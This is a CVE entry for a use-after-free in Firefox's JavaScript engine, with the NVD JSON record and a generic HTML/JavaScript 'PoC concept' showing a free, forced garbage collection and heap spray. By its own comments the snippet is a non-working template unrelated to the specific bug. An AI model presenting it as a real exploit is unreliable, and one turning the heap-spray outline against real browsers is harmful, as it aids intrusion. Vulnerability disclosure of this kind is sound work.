CVE-2026-4723

<!-- CVE-2026-4723 PoC Concept This is a generic demonstration of a Use-After-Free scenario in a JavaScript engine. Specific exploitation requires knowledge of the exact engine version and heap layout. --> <html> <body> <script> // Step 1: Allocate an object that will be freed let vulnerable_object = new ArrayBuffer(0x1000); // Step 2: Function to trigger the vulnerability (UAF) // In a real scenario, this involves specific engine APIs that cause the free // but leave a reference in another structure. function trigger_uaf() { // Simulating the free operation vulnerable_object = null; // Force garbage collection (implementation dependent) if (typeof gc !== 'undefined') { gc(); } } trigger_uaf(); // Step 3: Heap Spraying to reclaim the freed memory // We try to allocate memory that overlaps with the freed object let spray_buffer = new Uint8Array(0x1000 * 0x100); for (let i = 0; i < spray_buffer.length; i++) { spray_buffer[i] = 0x41; // 'A' } // Step 4: Attempt to access the freed memory via dangling reference // If successful, we read the data we sprayed (0x41), confirming control. // Note: In this generic code, 'vulnerable_object' is explicitly null, // a real exploit would use a hidden reference kept by the engine. console.log("PoC execution completed. Check for crashes or memory corruption."); </script> </body> </html>

{"cve": {"id": "CVE-2026-4723", "sourceIdentifier": "[email protected]", "published": "2026-03-24T13:16:08.190", "lastModified": "2026-04-13T15:17:44.557", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Use-after-free in the JavaScript Engine component. This vulnerability was fixed in Firefox 149 and Thunderbird 149."}, {"lang": "es", "value": "Uso después de liberación en el componente del motor JavaScript. Esta vulnerabilidad afecta a Firefox &lt; 149 y Thunderbird &lt; 149."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:*", "versionEndExcluding": "149.0", "matchCriteriaId": "02F2B82F-E997-4D5F-BBB0-237E4962555B"}]}]}], "references": [{"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=2013573", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-20/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-23/", "source": "[email protected]"}]}}